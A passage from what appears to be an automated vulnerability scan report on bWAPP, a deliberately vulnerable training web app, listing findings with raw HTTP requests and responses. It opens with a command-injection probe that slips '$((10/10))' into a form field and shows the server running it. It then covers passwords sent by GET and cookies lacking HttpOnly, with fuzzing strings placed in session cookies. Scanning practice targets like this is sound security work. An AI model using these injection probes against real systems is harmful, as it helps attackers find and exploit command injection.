    Content-Length: 46
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    form=submit&target=www.nsa.govw3sod3$((10/10))

    Response 8

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:15:34 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13046

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    <p align="left">Server:        192.168.52.2
    Address:    192.168.52.2#53

    ** server can't find www.nsa.govw3sod31: NXDOMAIN

    </p>
    ...[SNIP]...
    12. Password submitted using GET method
    Previous  Next

    There are 2 instances of this issue:

    Issue background

    Some applications use the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

    Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

    Vulnerability classifications



    12.1. http://192.168.52.147/bWAPP/ba_insecure_login_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login_2.php

    Issue detail

    The page contains a form with the following action URL, which is submitted using the GET method:
    • http://192.168.52.147/bWAPP/ba_insecure_login_2.php
    The form contains the following password field:
    • passphrase

    Request 1

    GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 15303

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form>

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="passphrase" name="passphrase" size="20" /></p>
    ...[SNIP]...
    12.2. http://192.168.52.147/bWAPP/xmli_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/xmli_1.php

    Issue detail

    The page contains a form with the following action URL, which is submitted using the GET method:
    • http://192.168.52.147/bWAPP/xmli_1.php
    The form contains the following password field:
    • password

    Request 1

    GET /bWAPP/xmli_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13136

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    </p>

    <form action="/bWAPP/xmli_1.php" method="GET">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
    ...[SNIP]...
    13. Cookie without HttpOnly flag set
    Previous  Next

    There are 17 instances of this issue:

    Issue background

    If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure makes certain client-side attacks, such as cross-site scripting, slightly harder to exploit by preventing them from trivially capturing the cookie's value via an injected script.

    Vulnerability classifications



    13.1. http://192.168.52.147/bWAPP/ba_captcha_bypass.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_captcha_bypass.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_captcha_bypass.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:03:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=62da764a0b47ad430e1ea925a689d8ff; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.2. http://192.168.52.147/bWAPP/ba_forgotten.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_forgotten.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_forgotten.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:04:03 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=3b4e4cf6377de603fe619c550583d7e7; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.3. http://192.168.52.147/bWAPP/ba_insecure_login_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login_2.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:05:30 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=b10596778c7bdc2f4ea30a13577820e6; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.4. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_pwd_attacks_2.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:07:45 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=06717d1d763caebb3efff0a6abd5857d; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.5. http://192.168.52.147/bWAPP/ba_weak_pwd.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_weak_pwd.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_weak_pwd.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:09:44 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=1fdf6353230d8257460cfa12ab3a2e7b; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.6. http://192.168.52.147/bWAPP/bof_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/bof_1.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/bof_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:10:27 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=e61c4d2eefc050713fefe64fb2e7f9f1; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.7. http://192.168.52.147/bWAPP/bof_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/bof_2.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/bof_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:12:52 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=7bb6a5d2d1a2f5bdf8e5830d3ff1941a; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.8. http://192.168.52.147/bWAPP/captcha_box.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/captcha_box.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/captcha_box.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:15:37 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=42316c2dfc7731a0d341e92b7b3d5547; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.9. http://192.168.52.147/bWAPP/clickjacking.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/clickjacking.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/clickjacking.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/http_verb_tampering.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:16:05 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=72a5689580d7fc97d4db155b943f4ea9; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.10. http://192.168.52.147/bWAPP/commandi.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/commandi.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ldap_connect.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:17:42 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=031799dbb1d163b05fb89ec702e444c5; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.11. http://192.168.52.147/bWAPP/login.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/login.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    POST /bWAPP/login.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/login.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 51
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
    Connection: close

    login=bee&password=bug&security_level=0&form=submit

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:52:27 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; path=/
    Set-Cookie: security_level=0; expires=Sat, 09-Mar-2019 02:52:27 GMT; path=/
    Location: portal.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.12. http://192.168.52.147/bWAPP/portal.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/portal.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/portal.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Connection: close

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.13. http://192.168.52.147/bWAPP/sqli_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_1.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/sqli_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:08:00 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=65507f4c7c2b9a6bf7ced8122531c455; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.14. http://192.168.52.147/bWAPP/sqli_10-1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_10-1.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/sqli_10-1.php?title=555-555-0199@example.com HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/sqli_10-1.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:11:26 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=519feb3595bbd669e05d65c5bb7df381; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.15. http://192.168.52.147/bWAPP/xmli_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/xmli_1.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/xmli_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:15:02 GMT
